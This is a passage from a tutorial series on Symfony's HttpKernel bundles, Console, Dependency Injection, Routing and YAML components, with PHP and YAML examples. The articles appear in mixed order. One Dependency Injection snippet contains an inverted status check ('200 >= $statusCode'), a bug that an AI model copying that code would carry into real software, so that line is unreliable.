array(new Reference($id), $event['method']),
isset($event['priority']) ? $event['priority'] : 0,
));
}
}
}
}
With this, we only need to add a tag to a service definition with:
- a name (kernel.event_listener)
- an event (e.g. kernel.request)
- a method (e.g. onKernelRequest)
- an optional priority (defaults to 0, the greater the sooner it will be executed)
To complete the step, we need to register it in our bundle:
<?php
// VendorNanoFrameworkBundle.php
namespace Vendor\NanoFrameworkBundle;
use Symfony\Component\DependencyInjection\ContainerBuilder;
use Symfony\Component\HttpKernel\Bundle\Bundle;
use Vendor\NanoFrameworkBundle\DependencyInjection\CompilerPass\AddListenersPass;
class VendorNanoFrameworkBundle extends Bundle
{
public function build(ContainerBuilder $container)
{
parent::build($container);
$container->addCompilerPass(new AddListenersPass());
}
}
Note: While CompilerPassInterface implementations need to be registered explicitly, there is no need to do anything for ExtensionInterface implementations, as Bundle contains a method able to locate it based on the following conventions:
- it needs to be in the DependencyInjection directory
- it needs to be named after the bundle name (replace the Bundle suffix by Extension)
- it needs to implement ExtensionInterface
HttpKernel relies on event listeners for the routing. In order to enable it, we need to add the following configuration:
# Resources/config/services/routing.yml
services:
router_listener:
class: Symfony\Component\HttpKernel\EventListener\RouterListener
arguments:
- "@router"
- "@request_stack"
- "@router.request_context"
tags:
- { name: kernel.event_listener, event: kernel.request, method: onKernelRequest, priority: 32 }
router:
class: Symfony\Component\Routing\Router
public: false
arguments:
- "@routing.loader"
- "%kernel.root_dir%/config/routings"
- "%router.options%"
- "@router.request_context"
calls:
- [setConfigCacheFactory, ["@config_cache_factory"]]
routing.loader:
class: Symfony\Component\Config\Loader\DelegatingLoader
public: false
arguments:
- "@routing.resolver"
routing.resolver:
class: Symfony\Component\Config\Loader\LoaderResolver
public: false
calls:
- [addLoader, ["@routing.loader.yml"]]
router.request_context:
class: Symfony\Component\Routing\RequestContext
public: false
config_cache_factory:
class: Symfony\Component\Config\ResourceCheckerConfigCacheFactory
public: false
routing.loader.yml:
class: Symfony\Component\Routing\Loader\YamlFileLoader
public: false
arguments:
- "@file_locator"
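The flow these definitions wire up can be sketched in plain PHP. This is a toy illustration of what RouterListener conceptually does on kernel.request, not Symfony's actual classes: match the path, then store the resulting controller in the request's attributes.

```php
<?php

// Toy illustration of the RouterListener flow (not Symfony's actual code):
// a route map, a stand-in for Request->attributes, and a kernel.request listener.
$routes = array(
    '/v1/articles' => 'Vendor\Project\Controller\ArticleController::search',
);

$attributes = array(); // stand-in for Request->attributes

$onKernelRequest = function ($pathInfo) use ($routes, &$attributes) {
    if (!isset($routes[$pathInfo])) {
        // Symfony would throw ResourceNotFoundException here
        throw new \RuntimeException(sprintf('No route found for "%s"', $pathInfo));
    }
    $attributes['_controller'] = $routes[$pathInfo];
};

$onKernelRequest('/v1/articles');
// $attributes['_controller'] now holds the controller to execute
```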
Since Kernel is an abstract class, we need to create an implementation (usually
called AppKernel):
<?php
// Tests/app/AppKernel.php
use Symfony\Component\HttpKernel\Kernel;
class AppKernel extends Kernel
{
public function registerBundles()
{
return array(
new Vendor\NanoFrameworkBundle\VendorNanoFrameworkBundle(),
);
}
public function getRootDir()
{
return __DIR__;
}
public function getCacheDir()
{
return dirname(__DIR__).'/var/cache/'.$this->getEnvironment();
}
public function getLogDir()
{
return dirname(__DIR__).'/var/logs';
}
}
Finally we need to create a "Front Controller" (a fancy name for index.php):
<?php
// Tests/web/index.php
use Symfony\Component\HttpFoundation\Request;
$kernel = new AppKernel('prod', false);
$request = Request::createFromGlobals();
$response = $kernel->handle($request);
$response->send();
$kernel->terminate($request, $response);
Bundles enable us to define classes as Dependency Injection services, for our applications and third-party libraries, in a reusable way.
In the example above we've created a bundle that provides a http_kernel service,
which can then be used to create Symfony applications. Here are some existing
bundles that do it for us:
There are many bundles available, you can find them by checking symfony-bundle in Packagist.
Reference: This article is intended to be as complete as possible and is kept up to date.
TL;DR: $statusCode = $application->run($input);
In this guide we explore the standalone libraries (also known as "Components") provided by Symfony to help us build applications.
We've already seen:
We're now about to check the last one: Console.
In the next articles we'll also see how HttpKernel enables reusable code with Bundles, and the different ways to organize our application tree directory.
Finally we'll finish by putting all this knowledge in practice by creating a "fortune" project with:
Symfony provides a Console component
which allows us to create CLI commands. Its main class is Application:
<?php
namespace Symfony\Component\Console;
use Symfony\Component\Console\Input\InputInterface;
use Symfony\Component\Console\Output\OutputInterface;
use Symfony\Component\Console\Command\Command;
class Application
{
public function __construct($name = 'UNKNOWN', $version = 'UNKNOWN');
public function add(Command $command);
public function setDefaultCommand($commandName);
public function run(InputInterface $input = null, OutputInterface $output = null);
public function setAutoExit($boolean);
}
Note: This snippet is a truncated version. Please note that Application is (unfortunately) not an interface.
We can create it as follows:
<?php
// /tmp/console.php
use Symfony\Component\Console\Application;
use Symfony\Component\Console\Input\ArgvInput;
$application = new Application('My Application', 'v4.2.3');
$application->add($command);
$application->setDefaultCommand($command->getName());
$application->run(new ArgvInput());
Which can then be used as follows:
php /tmp/console.php
Note: After running the command, Application will automatically stop using exit. As this can sometimes be inconvenient (for example in tests), we can disable it with this line: $application->setAutoExit(false);
Out of the box, Application has two commands:
- list, which lists all available commands (it's the default command if setDefaultCommand hasn't been used)
- help, which displays a description with available arguments and options for the current command
In order for Application to be useful, we need to create commands. This can be
done by extending Command:
<?php
namespace Symfony\Component\Console\Command;
use Symfony\Component\Console\Input\InputArgument;
use Symfony\Component\Console\Input\InputInterface;
use Symfony\Component\Console\Input\InputOption;
use Symfony\Component\Console\Output\OutputInterface;
class Command
{
public function run(InputInterface $input, OutputInterface $output);
// Called by run
protected function execute(InputInterface $input, OutputInterface $output);
protected function interact(InputInterface $input, OutputInterface $output);
protected function configure();
// To be called in configure
public function setName($name);
public function addArgument($name, $mode = null, $description = '', $default = null);
public function addOption($name, $shortcut = null, $mode = null, $description = '', $default = null);
public function setDescription($description);
public function setHelp($help);
public function setAliases($aliases);
}
We can configure the command (name, arguments, options, description, etc.) in the
configure method, we can define more options to be asked interactively in
the interact method (e.g. Are you sure? (Y/n)), and finally we can write the
command logic in the execute method.
Commands are to Console what Controllers are to HttpKernel: their responsibility is to extract input parameters, pass them to a service and then put the service's returned value in the output.
Input parameters are wrapped in the following interface:
<?php
namespace Symfony\Component\Console\Input;
interface InputInterface
{
public function getArgument($name);
public function getOption($name);
}
Out of the box we have the following implementations:
- ArgvInput: wraps CLI arguments coming from $_SERVER['argv']
- ArrayInput: defines arguments using an array, which is useful for tests
Application will take care of validating InputInterface parameters against
the Command configuration (e.g. whether required arguments are present).
While InputInterface can be seen as a value object, OutputInterface should
be seen as a service able to send information to a stream:
<?php
namespace Symfony\Component\Console\Output;
abstract class Output implements OutputInterface
{
public function writeln($messages, $type = self::OUTPUT_NORMAL);
}
The writeln method allows us to write a line (with a newline character at
the end). If the given message is an array, it will print each element on a new
line.
The given message can contain tags (e.g. Arthur <info>Dent</info>), which can
be used to format it. Out of the box it will color the following:
- green for informative messages (e.g. <info>Arthur Dent</info>)
- yellow for comments (e.g. <comment>Tricia McMillan</comment>)
- black on cyan for questions (e.g. <question>Ford Prefect</question>)
- white on red for errors (e.g. <error>Marvin</error>)
The Console component allows us to create CLI applications. Its Commands are a thin layer which gathers the input and calls services. Those services can then output messages to the user.
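These tags boil down to wrapping text in ANSI escape codes. Here's a toy sketch of the idea (Symfony's real OutputFormatter additionally handles nesting, custom styles and tag escaping):

```php
<?php

// Toy formatter: maps a few known tags to ANSI color codes.
// Not Symfony's OutputFormatter, just the underlying idea.
function formatToAnsi($message)
{
    $styles = array(
        'info' => '32',     // green
        'comment' => '33',  // yellow
        'error' => '37;41', // white on red
    );
    foreach ($styles as $tag => $code) {
        $message = str_replace("<$tag>", "\033[{$code}m", $message);
        $message = str_replace("</$tag>", "\033[0m", $message);
    }

    return $message;
}

// formatToAnsi('Arthur <info>Dent</info>') wraps "Dent" in green escape codes.
```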
Note: Since Symfony follows a Console Output Formatting Style Guide, the Console component provides the following helper class:
<?php
namespace Symfony\Component\Console\Style;
use Symfony\Component\Console\Input\InputInterface;
use Symfony\Component\Console\Output\OutputInterface;
use Symfony\Component\Console\Question\Question;
class SymfonyStyle
{
public function __construct(InputInterface $input, OutputInterface $output);
public function block($messages, $type = null, $style = null, $prefix = ' ', $padding = false);
public function title($message);
public function section($message);
public function listing(array $elements);
public function text($message);
public function comment($message);
public function success($message);
public function error($message);
public function warning($message);
public function note($message);
public function caution($message);
public function table(array $headers, array $rows);
public function ask($question, $default = null, $validator = null);
public function askHidden($question, $validator = null);
public function confirm($question, $default = true);
public function choice($question, array $choices, $default = null);
public function askQuestion(Question $question);
public function progressStart($max = 0);
public function progressAdvance($step = 1);
public function progressFinish();
public function createProgressBar($max = 0);
public function writeln($messages, $type = self::OUTPUT_NORMAL);
public function write($messages, $newline = false, $type = self::OUTPUT_NORMAL);
public function newLine($count = 1);
}
Reference: This article is intended to be as complete as possible and is kept up to date.
TL;DR: Make Dependency Injection easy by moving class construction in configuration files.
In this guide we explore the standalone libraries (also known as "Components") provided by Symfony to help us build applications.
We've already seen:
We're now about to check Dependency Injection, then in the next article we'll have a look at Console.
We'll also see how HttpKernel enables reusable code with Bundles, and the different ways to organize our application tree directory.
Finally we'll finish by putting all this knowledge in practice by creating a "fortune" project with:
When first creating a class, we tend to keep it small and tidy. Then over time it can grow out of control, and the next thing we know it has become a multi-thousand-line monster:
<?php
class CheckApiStatus
{
public function check($url)
{
$curl = curl_init();
curl_setopt_array($curl, array(
CURLOPT_RETURNTRANSFER => true,
CURLOPT_HEADER => true,
CURLOPT_URL => $url,
));
$response = curl_exec($curl);
$headerSize = curl_getinfo($curl, CURLINFO_HEADER_SIZE);
$statusCode = curl_getinfo($curl, CURLINFO_HTTP_CODE);
curl_close($curl);
$headers = array_map(function ($line) {
return explode(': ', trim($line));
}, explode("\n", substr($response, 0, $headerSize)));
array_pop($headers);
array_pop($headers);
array_shift($headers);
$body = substr($response, $headerSize);
return 200 <= $statusCode && $statusCode < 400;
}
}
A nice way to shrink it back to an acceptable level is to identify the many "responsibilities" it bears and split those in sub classes. This process is called refactoring:
<?php
class Request
{
private $uri;
public function __construct($uri)
{
$this->uri = $uri;
}
public function getUri()
{
return $this->uri;
}
}
class Response
{
private $statusCode;
private $headers;
private $body;
public function __construct($statusCode, $headers, $body)
{
$this->statusCode = $statusCode;
$this->headers = $headers;
$this->body = $body;
}
public function getStatusCode()
{
return $this->statusCode;
}
public function getHeaders()
{
return $this->headers;
}
public function getBody()
{
return $this->body;
}
}
interface HttpClient
{
/**
* @return Response
*/
public function sendRequest(Request $request);
}
class CurlHttpClient implements HttpClient
{
public function sendRequest(Request $request)
{
$curl = curl_init();
curl_setopt_array($curl, array(
CURLOPT_RETURNTRANSFER => true,
CURLOPT_HEADER => true,
CURLOPT_URL => $request->getUri(),
));
$response = curl_exec($curl);
$headerSize = curl_getinfo($curl, CURLINFO_HEADER_SIZE);
$statusCode = curl_getinfo($curl, CURLINFO_HTTP_CODE);
curl_close($curl);
$headers = array_map(function ($line) {
return explode(': ', trim($line));
}, explode("\n", substr($response, 0, $headerSize)));
array_pop($headers);
array_pop($headers);
array_shift($headers);
$body = substr($response, $headerSize);
return new Response($statusCode, $headers, $body);
}
}
class CheckApiStatus
{
public function check($url)
{
$httpClient = new CurlHttpClient();
$statusCode = $httpClient->sendRequest(new Request($url))->getStatusCode();
return 200 <= $statusCode && $statusCode < 400;
}
}
Note: for more refactoring examples, check:
- Refactoring external service by Martin Fowler
- Extract till you drop by Mathias Verraes
- Refactoring the cat API part 1 part 2 part 3 by Matthias Noback
Our original class then has to call those sub classes to "delegate" the work. But how does it access those sub classes? Should it instantiate them in its methods? A better place could be the constructor, where the instances are stored in the class properties so they can be shared between calls.
Or even better we can instantiate them out of the class, and then pass them as arguments to the original class constructor, so we can share it with other classes:
<?php
class CheckApiStatus
{
private $httpClient;
public function __construct(HttpClient $httpClient)
{
$this->httpClient = $httpClient;
}
public function check($url)
{
$statusCode = $this->httpClient->sendRequest(new Request($url))->getStatusCode();
return 200 >= $statusCode && $statusCode < 400;
}
}
$httpClient = new CurlHttpClient();
$checkApiStatus = new CheckApiStatus($httpClient);
Note: Now CheckApiStatus is decoupled from the remote request logic. The refactoring steps might seem like producing more code just for the "beauty" of principles, but it actually enables us to remove code entirely: by using PSR-7 interfaces instead of our own we can easily switch to Guzzle or any other HTTP client library.
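This decoupling also pays off in tests: we can hand CheckApiStatus a stub client and assert on its behavior without any network traffic. A self-contained sketch, using simplified versions of the classes above (the stub's always-200 response is made up for the example):

```php
<?php

// Simplified versions of the classes from this article, redeclared
// so the snippet is self-contained.
class Request
{
    private $uri;
    public function __construct($uri) { $this->uri = $uri; }
    public function getUri() { return $this->uri; }
}

class Response
{
    private $statusCode;
    public function __construct($statusCode) { $this->statusCode = $statusCode; }
    public function getStatusCode() { return $this->statusCode; }
}

interface HttpClient
{
    public function sendRequest(Request $request);
}

// A stub that never touches the network: it always answers 200 OK.
class StubHttpClient implements HttpClient
{
    public function sendRequest(Request $request)
    {
        return new Response(200);
    }
}

class CheckApiStatus
{
    private $httpClient;
    public function __construct(HttpClient $httpClient) { $this->httpClient = $httpClient; }
    public function check($url)
    {
        $statusCode = $this->httpClient->sendRequest(new Request($url))->getStatusCode();
        return 200 <= $statusCode && $statusCode < 400;
    }
}

$checkApiStatus = new CheckApiStatus(new StubHttpClient());
// check() now returns true without any HTTP call being made
```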
And that's what Dependency Injection is all about: taking parameters (also known as dependencies) our class (also known as service) needs and pass them as arguments (also known as injection), to allow more decoupling.
The downside of this design pattern is that we now have a cascade of instantiations.
Note: Classes can be shared if they are stateless which means calling a method shouldn't change their attributes.
Symfony provides a Dependency Injection component which allows us to set up how our classes are constructed:
<?php
use Symfony\Component\DependencyInjection\ContainerBuilder;
use Symfony\Component\DependencyInjection\Reference;
$container = new ContainerBuilder();
$container
->register('http_client','CurlHttpClient')
;
$container
->register('check_api_status', 'CheckApiStatus')
->addArgument(new Reference('http_client'))
;
$checkApiStatus = $container->get('check_api_status');
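To demystify what the container does, here's a toy container in plain PHP: it stores factories at register() time and only instantiates on get(), resolving references between services at that point. ToyContainer is a made-up name for illustration; Symfony's ContainerBuilder does far more (definitions, compilation, configuration loading).

```php
<?php

// Toy service container: stores factories, instantiates lazily on get(),
// and shares the created instance afterwards. Illustration only.
class ToyContainer
{
    private $factories = array();
    private $services = array();

    public function register($id, callable $factory)
    {
        $this->factories[$id] = $factory;
    }

    public function get($id)
    {
        // instantiate on first request, then reuse the same instance
        if (!isset($this->services[$id])) {
            $this->services[$id] = call_user_func($this->factories[$id], $this);
        }

        return $this->services[$id];
    }
}

$container = new ToyContainer();
$container->register('http_client', function () {
    return new \stdClass(); // stand-in for CurlHttpClient
});
$container->register('check_api_status', function (ToyContainer $c) {
    $service = new \stdClass(); // stand-in for CheckApiStatus
    $service->httpClient = $c->get('http_client'); // reference resolved here
    return $service;
});
```

Calling $container->get('check_api_status') triggers the http_client factory as a side effect, which is the cascade of instantiations mentioned earlier, handled for us.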
It can even be set up using configuration:
# /tmp/services/api.yml
services:
http_client:
class: CurlHttpClient
check_api_status:
class: CheckApiStatus
arguments:
- '@http_client'
Note: Some string values must be escaped using single quotes because YAML has a list of reserved characters, including: @, %, \, -, :, [, ], { and }.
Here's how we can load this configuration:
<?php
use Symfony\Component\Config\FileLocator;
use Symfony\Component\Config\Loader\LoaderResolver;
use Symfony\Component\DependencyInjection\ContainerBuilder;
use Symfony\Component\DependencyInjection\Loader\DirectoryLoader;
use Symfony\Component\DependencyInjection\Loader\YamlFileLoader;
$container = new ContainerBuilder();
// Load recursively all YAML configuration files in services directories
$fileLocator = new FileLocator(__DIR__);
$loader = new DirectoryLoader($container, $fileLocator);
$loader->setResolver(new LoaderResolver(array(
new YamlFileLoader($container, $fileLocator),
$loader,
)));
$loader->load('/services/');
$checkApiStatus = $container->get('check_api_status');
Calling methods on a created service to complete its initialization is possible:
services:
my_event_listener:
class: MyEventListener
event_dispatcher:
class: 'Symfony\Component\EventDispatcher\EventDispatcher'
calls:
- [ addListener, [ kernel.request, '@my_event_listener', 42 ] ]
Note: There's a better way to add listeners to the EventDispatcher, keep reading to find out how.
Finally it might be useful to create aliases:
services:
http_client:
alias: curl_http_client
curl_http_client:
class: CurlHttpClient
check_api_status:
class: CheckApiStatus
arguments:
- "@http_client"
In the example above http_client is set to be curl_http_client, it could be
changed later to use another implementation of HttpClient.
In addition to class instances, we can also inject parameters:
<?php
use Symfony\Component\DependencyInjection\ContainerBuilder;
use Symfony\Component\DependencyInjection\Parameter;
use Symfony\Component\DependencyInjection\Reference;
$container = new ContainerBuilder();
$container->setParameter('username', 'arthur.dent@example.com');
$container->setParameter('password', 42);
$container
->register('http_client','CurlHttpClient')
;
$container
->register('check_api_status', 'CheckApiStatus')
->addArgument(new Reference('http_client'))
->addArgument(new Parameter('username'))
->addArgument(new Parameter('password'))
;
$checkApiStatus = $container->get('check_api_status');
Note: For the example's sake we're pretending that
CheckApiStatus's constructor now takes 3 arguments.
Here's the equivalent in YAML:
# /tmp/services/api.yml
parameters:
username: 'arthur.dent@example.com'
password: 42
services:
http_client:
class: CurlHttpClient
check_api_status:
class: CheckApiStatus
arguments:
- '@http_client'
- '%username%'
- '%password%'
Note: services are prefixed with
@, and parameters are surrounded with %.
The value of a parameter can be anything:
The value of a parameter can be anything:
- null (~)
- a boolean (true or false)
- an integer (e.g. 42)
- a float (e.g. 44.23)
- a string (e.g. hello world, or escaped 'arthur.dent@example.com')
- a sequence (e.g. [ apples, oranges ])
- a map (e.g. { first_name: Arthur, last_name: Dent })
Note: The examples above for arrays are inline ones. They could also be on many lines:
parameters:
    fruits:
        - apples
        - oranges
    identity:
        first_name: Arthur
        last_name: Dent
    # We can even have multi dimension arrays:
    five_a_day:
        -
            - apples
            - oranges
        -
            - carrots
By creating a class that extends Extension, we can provide reusable Dependency
Injection configuration:
<?php
use Symfony\Component\Config\FileLocator;
use Symfony\Component\Config\Loader\LoaderResolver;
use Symfony\Component\DependencyInjection\ContainerBuilder;
use Symfony\Component\DependencyInjection\Loader\DirectoryLoader;
use Symfony\Component\DependencyInjection\Loader\YamlFileLoader;
use Symfony\Component\HttpKernel\DependencyInjection\Extension;
class AppExtension extends Extension
{
public function load(array $configs, ContainerBuilder $container)
{
$fileLocator = new FileLocator(__DIR__);
$loader = new DirectoryLoader($container, $fileLocator);
$loader->setResolver(new LoaderResolver(array(
new YamlFileLoader($container, $fileLocator),
$loader,
)));
$loader->load('/services/');
}
}
$container = new ContainerBuilder();
$appExtension = new AppExtension();
$appExtension->load(array(), $container);
$checkApiStatus = $container->get('check_api_status');
The Container implementation provides a compile method that resolves parameters
(replaces %parameter% placeholders with the parameter value) and freezes them
(calling setParameter will then result in an exception).
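Parameter resolution is essentially string interpolation over the service definitions. A minimal sketch of the %placeholder% replacement (the real resolver also handles %% escaping, nested parameters, and non-string values):

```php
<?php

// Sketch of %parameter% resolution, as performed during compile().
// The real ParameterBag also handles %% escaping and nested parameters.
function resolvePlaceholders($value, array $parameters)
{
    return preg_replace_callback(
        '/%([^%\s]+)%/',
        function ($matches) use ($parameters) {
            return $parameters[$matches[1]];
        },
        $value
    );
}

// resolvePlaceholders('login as %username%', array('username' => 'arthur.dent@example.com'))
// yields 'login as arthur.dent@example.com'
```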
The ContainerBuilder implementation also has a compile method which is going
to execute all registered CompilerPassInterface implementations.
For example, we can retrieve all services "tagged" kernel.event_listener and
add them to the EventDispatcher with the following one:
<?php
use Symfony\Component\DependencyInjection\ContainerBuilder;
use Symfony\Component\DependencyInjection\Compiler\CompilerPassInterface;
use Symfony\Component\DependencyInjection\Reference;
class EventListenerCompilerPass implements CompilerPassInterface
{
public function process(ContainerBuilder $container)
{
if (false === $container->hasDefinition('event_dispatcher')) {
return;
}
$eventDispatcher = $container->getDefinition('event_dispatcher');
$taggedServices = $container->findTaggedServiceIds('kernel.event_listener');
foreach ($taggedServices as $id => $tags) {
foreach ($tags as $attributes) {
$eventDispatcher->addMethodCall('addListener', array(
$attributes['event'],
array(new Reference($id), $attributes['method']),
isset($attributes['priority']) ? $attributes['priority'] : 0,
));
}
}
}
}
Note: The EventDispatcher component already provides a
RegisterListenersPass.
The configuration for a "tagged" service looks like this:
services:
my_event_listener:
class: MyEventListener
tags:
- { name: kernel.event_listener, event: kernel.request, method: onKernelRequest, priority: 42 }
Note: With this, it is no longer required to call addListener in event_dispatcher's configuration.
By providing a configurable way to define service construction, the DependencyInjection component allows us to use the design pattern of the same name in our projects.
The HttpKernel component provides two HttpKernelInterface implementations:
- HttpKernel, which does the HTTP logic
- Kernel, which sets up a DependencyInjection container and then uses HttpKernel
Just like for the Routing component, there's a PhpDumper which can generate an
implementation of ContainerInterface with all configuration in an optimized way.
It might look like this:
<?php
use Symfony\Component\DependencyInjection\ContainerInterface;
use Symfony\Component\DependencyInjection\Container;
use Symfony\Component\DependencyInjection\Exception\InvalidArgumentException;
use Symfony\Component\DependencyInjection\Exception\LogicException;
use Symfony\Component\DependencyInjection\Exception\RuntimeException;
use Symfony\Component\DependencyInjection\ParameterBag\FrozenParameterBag;
class appDevDebugProjectContainer extends Container
{
private $parameters;
private $targetDirs = array();
public function __construct()
{
$dir = __DIR__;
for ($i = 1; $i <= 5; ++$i) {
$this->targetDirs[$i] = $dir = dirname($dir);
}
$this->parameters = $this->getDefaultParameters();
$this->services = array();
$this->methodMap = array(
'http_client' => 'getHttpClientService',
'check_api_status' => 'getCheckApiStatusService',
);
$this->aliases = array(
);
}
public function compile()
{
throw new LogicException('You cannot compile a dumped frozen container.');
}
protected function getHttpClientService()
{
return $this->services['http_client'] = new \CurlHttpClient();
}
protected function getCheckApiStatusService()
{
return $this->services['check_api_status'] = new \CheckApiStatus($this->get('http_client'), 'arthur.dent@example.com', 42);
}
public function getParameter($name)
{
$name = strtolower($name);
if (!(isset($this->parameters[$name]) || array_key_exists($name, $this->parameters))) {
throw new InvalidArgumentException(sprintf('The parameter "%s" must be defined.', $name));
}
return $this->parameters[$name];
}
public function hasParameter($name)
{
$name = strtolower($name);
return isset($this->parameters[$name]) || array_key_exists($name, $this->parameters);
}
public function setParameter($name, $value)
{
throw new LogicException('Impossible to call set() on a frozen ParameterBag.');
}
public function getParameterBag()
{
if (null === $this->parameterBag) {
$this->parameterBag = new FrozenParameterBag($this->parameters);
}
return $this->parameterBag;
}
protected function getDefaultParameters()
{
return array(
'username' => 'arthur.dent@example.com',
'password' => 42,
);
}
}
Note: Dependencies that are used by only one service can be marked as "private": they'll be hard coded in the service instantiation (but they won't be available anymore from $container->get()). In our example we could mark http_client as private, so the dumped Container wouldn't have a getHttpClientService method:
services:
    http_client:
        class: CurlHttpClient
        public: false
It is also worth noting that services are by default only initialized once and on demand, so the number of services doesn't impact the performance of the application.
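We can make this once-and-on-demand behavior concrete with a counter, mimicking the dumped container's getXxxService() methods (a plain PHP sketch, not generated code):

```php
<?php

// Sketch: lazy, memoized service creation. Registering factories costs
// nothing until a service is requested, and each factory runs at most once.
$instantiations = 0;

$factories = array(
    'http_client' => function () use (&$instantiations) {
        ++$instantiations;
        return new \stdClass();
    },
);
$services = array();

$get = function ($id) use ($factories, &$services) {
    // initialize on first request, then reuse the shared instance
    if (!isset($services[$id])) {
        $services[$id] = $factories[$id]();
    }
    return $services[$id];
};

$get('http_client');
$get('http_client');
// $instantiations is still 1: the factory ran only once
```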
Reference: This article is intended to be as complete as possible and is kept up to date.
TL;DR:
$parameters = $urlMatcher->match($request->getPathInfo());
$request->attributes->add(array('_controller' => $parameters['_controller']));
$request->attributes->add(array('_route' => $parameters['_route']));
unset($parameters['_controller'], $parameters['_route']);
$request->attributes->add(array('_route_params' => $parameters));
In this guide we explore the standalone libraries (also known as "Components") provided by Symfony to help us build applications.
We've already seen:
We're now about to check Routing and YAML, then in the next articles we'll have a look at:
We'll also see how HttpKernel enables reusable code with Bundles, and the different ways to organize our application tree directory.
Finally we'll finish by putting all this knowledge in practice by creating a "fortune" project with:
Symfony provides a Routing component which allows us, for a HTTP request/URL, to execute a specific function (also known as "Controller").
Note: Controllers must be a callable, for example:
- an anonymous function: $controller = function (Request $request) { return new Response(); };
- an array with an instance of a class and a method name: $controller = array($controller, 'searchArticles');
- a fully qualified class name with a static method name: $controller = 'Vendor\Project\Controller\ArticleController::searchArticles'.
Controllers can take a Request argument and should return a Response instance.
It revolves around the following interface:
<?php
namespace Symfony\Component\Routing\Matcher;
use Symfony\Component\Routing\Exception\ResourceNotFoundException;
use Symfony\Component\Routing\Exception\MethodNotAllowedException;
interface UrlMatcherInterface
{
/**
* @param string $pathinfo
*
* @return array Route parameters (also contains `_route`)
*
* @throws ResourceNotFoundException
* @throws MethodNotAllowedException
*/
public function match($pathinfo);
}
Note: For brevity the interface has been stripped of RequestContextAwareInterface.
In actual applications we don't need to implement it as the component provides
a nice implementation that works with RouteCollection:
<?php
use Symfony\Component\Routing\RouteCollection;
use Symfony\Component\Routing\Route;
$collection = new RouteCollection();
$collection->add('search_articles', new Route('/v1/articles', array(
'_controller' => 'Vendor\Project\Controller\ArticleController::search',
), array(), array(), '', array(), array('GET', 'HEAD')));
$collection->add('edit_article', new Route('/v1/articles/{id}', array(
'_controller' => 'Vendor\Project\Controller\ArticleController::edit',
), array(), array(), '', array(), array('PUT')));
RouteCollection allows us to configure which Requests will match our controllers,
via URL patterns and the Request method. It also allows us to specify parts of the URLs
as URI parameters (e.g. id in the above snippet).
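The {id} placeholder ends up as a named capture group in a regular expression, which is exactly the shape visible in the dumped matcher at the end of this article. A simplified sketch of that translation (ignoring requirements and optional parameters):

```php
<?php

// Sketch: turn a route pattern into a regex with named groups,
// the way the dumped UrlMatcher does (simplified).
function patternToRegex($pattern)
{
    // {id} becomes (?P<id>[^/]++)
    $regex = preg_replace('#\{(\w+)\}#', '(?P<$1>[^/]++)', $pattern);

    return '#^'.$regex.'$#s';
}

function matchPath($pattern, $path)
{
    if (!preg_match(patternToRegex($pattern), $path, $matches)) {
        return null;
    }
    // keep only the named parameters, drop numeric captures
    return array_filter($matches, 'is_string', ARRAY_FILTER_USE_KEY);
}

// matchPath('/v1/articles/{id}', '/v1/articles/42') yields array('id' => '42')
```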
Building route configuration by interacting with PHP code can be tedious, so the Routing component supports alternative configuration formats: annotations, XML, YAML, etc.
Tip: have a look at
Symfony\Component\Routing\Loader\YamlFileLoader.
Symfony provides a YAML component which allows us to convert YAML configuration into PHP arrays (and vice versa).
For example the following YAML file:
# /tmp/routing.yml
search_articles:
path: /api/articles
defaults:
_controller: 'Vendor\Project\Controller\ArticleController::search'
methods:
- GET
- HEAD
edit_article:
path: '/api/articles/{id}'
defaults:
_controller: 'Vendor\Project\Controller\ArticleController::edit'
methods:
- PUT
Note: Some string values must be escaped using single quotes because YAML has a list of reserved characters, including: @, %, \, -, :, [, ], { and }.
Can be converted using:
<?php
use Symfony\Component\Yaml\Yaml;
$routing = Yaml::parse(file_get_contents('/tmp/routing.yml'));
This will result in the equivalent of the following array:
<?php
$routing = array(
'search_articles' => array(
'path' => '/api/articles',
'defaults' => array(
'_controller' => 'Vendor\Project\Controller\ArticleController::search',
),
'methods' => array(
'GET',
'HEAD',
),
),
'edit_article' => array(
'path' => '/api/articles/{id}',
'defaults' => array(
'_controller' => 'Vendor\Project\Controller\ArticleController::edit',
),
'methods' => array(
'PUT',
),
),
);
Note: the Routing component uses another component to then build RouteCollection from this array: the Config component, which is out of the scope of this guide.
There's also $yaml = Yaml::dump($array); that converts a PHP array into a YAML
string.
The Routing component allows us to define which Controllers should be executed for the given Request, and the Yaml component allows us to configure it in a simple way.
HttpKernel provides a RouterListener which makes use of UrlMatcher when the
Request is received to find a corresponding controller.
Note: Request->attributes is used to store information about the current Request, such as the matched route, the controller, etc. It's used internally by Symfony but we could also store our own values in it.
Some might be concerned with performance: reading the configuration from the filesystem may slow down the application.
Don't panic! There's a PhpMatcherDumper class which can generate an implementation
of UrlMatcherInterface with all configuration in an optimized way. It might look
like this:
<?php
use Symfony\Component\Routing\Exception\MethodNotAllowedException;
use Symfony\Component\Routing\Exception\ResourceNotFoundException;
use Symfony\Component\Routing\RequestContext;
class appDevUrlMatcher extends Symfony\Bundle\FrameworkBundle\Routing\RedirectableUrlMatcher
{
public function __construct(RequestContext $context)
{
$this->context = $context;
}
public function match($pathinfo)
{
$allow = array();
$pathinfo = rawurldecode($pathinfo);
$context = $this->context;
// edit_article
if (preg_match('#^/api/articles/(?P<id>[^/]++)$#s', $pathinfo, $matches)) {
if ($this->context->getMethod() != 'PUT') {
$allow[] = 'PUT';
goto not_edit_article;
}
return $this->mergeDefaults(array_replace($matches, array('_route' => 'edit_article')), array ( '_controller' => 'Vendor\Project\Controller\ArticleController::edit',));
}
not_edit_article:
// search_articles
if ($pathinfo === '/api/articles') {
if (!in_array($this->context->getMethod(), array('GET', 'HEAD'))) {
$allow = array_merge($allow, array('GET', 'HEAD'));
goto not_search_articles;
}
return array('_controller' => 'Vendor\Project\Controller\ArticleController::search', '_route' => 'search_articles');
}
not_search_articles:
throw 0 < count($allow) ? new MethodNotAllowedException(array_unique($allow)) : new ResourceNotFoundException();
}
}
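Stripped of the framework classes, the dumped matcher boils down to plain conditionals, which is why it's fast. Here's a hypothetical, self-contained sketch (matchRoute is a made-up name, not part of Symfony):

```php
<?php
// Framework-free sketch of what a dumped matcher does: the routing
// configuration is baked into `if` statements instead of being parsed
// from YAML on every request.
function matchRoute($pathinfo, $method)
{
    $allow = array();

    // edit_article
    if (preg_match('#^/api/articles/(?P<id>[^/]++)$#', $pathinfo, $matches)) {
        if ('PUT' === $method) {
            return array(
                '_route' => 'edit_article',
                '_controller' => 'Vendor\Project\Controller\ArticleController::edit',
                'id' => $matches['id'],
            );
        }
        $allow[] = 'PUT';
    }

    // search_articles
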